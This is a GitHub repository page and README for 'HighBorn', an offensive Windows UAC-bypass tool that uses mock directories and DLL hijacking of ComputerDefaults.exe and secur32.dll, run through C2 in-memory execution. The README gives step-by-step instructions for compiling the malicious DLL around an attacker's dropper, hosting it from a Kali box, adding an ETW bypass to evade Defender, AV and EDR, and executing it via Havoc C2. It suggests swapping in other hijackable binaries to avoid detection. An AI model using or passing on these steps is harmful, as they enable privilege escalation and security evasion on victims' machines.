assume-breach cdace5f80a Update HighBorn.cs 2 lat temu
..
HighBorn 1063d0ba71 Add files via upload 3 lat temu
packages 8c33f4623b Add files via upload 3 lat temu
HighBorn.c bf444cb137 Update HighBorn.c 3 lat temu
HighBorn.cs cdace5f80a Update HighBorn.cs 2 lat temu
HighBorn.sln 34d2577101 Add files via upload 3 lat temu
ReadMe.md 2c2342e54a Update ReadMe.md 3 lat temu

ReadMe.md

Windows UAC Bypass utilizing mock directories and DLL Hijacking. This is a tool that I created to use with the "dotnet inline-execution" command on Havoc C2, but it can be used with any C2 that has in-memory execution. SharpSploit's ETW Bypass has been added to evade Defender/AV/EDR. This was just a quick and dirty POC.

Usage:

Open the highborn.c file in a text editor on your Kali box.

Replace the file path with the file path of the executable that you want to open (ie your dropper).

Compile HighBorn.c into a dll.

linux command: "x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows"

Host the dll on your Kali box.

command: python3 -m http.server PORT

Compiling HighBorn On Visual Studio

git clone https://github.com/cobbr/SharpSploit.git

Compile SharpSploit by changing the build to Release and then click Build.

Open the HighBorn sln file. Right click on "Add Reference" and then click "Browse."

Go to your SharpSploit compiled folder and in "Release" click on the SharpSploit.dll file to add it to HighBorn.

Now compile HighBorn by changing the build tab to Release.

Compiling HighBorn Withoug ETW Bypass On Linux

Remove the SharpSploit references in the HighBorn.cs file.

apt install mono-complete -y mcs -out:HighBorn.exe Highborn.cs

Execute on C2

command: dotnet inline-execute HighBorn.exe

Replace the ComputerDefaults.exe and secur32.dll with other EXEs and DLLs as you find DLLs that can be hijacked. ComputerDefaults is a popular one so it is probably monitored pretty closely.

Still need help? I've documented the whole process here: https://assume-breach.medium.com/home-grown-red-team-uac-bypass-on-windows-defender-for-endpoint-with-highborn-e9ea16546029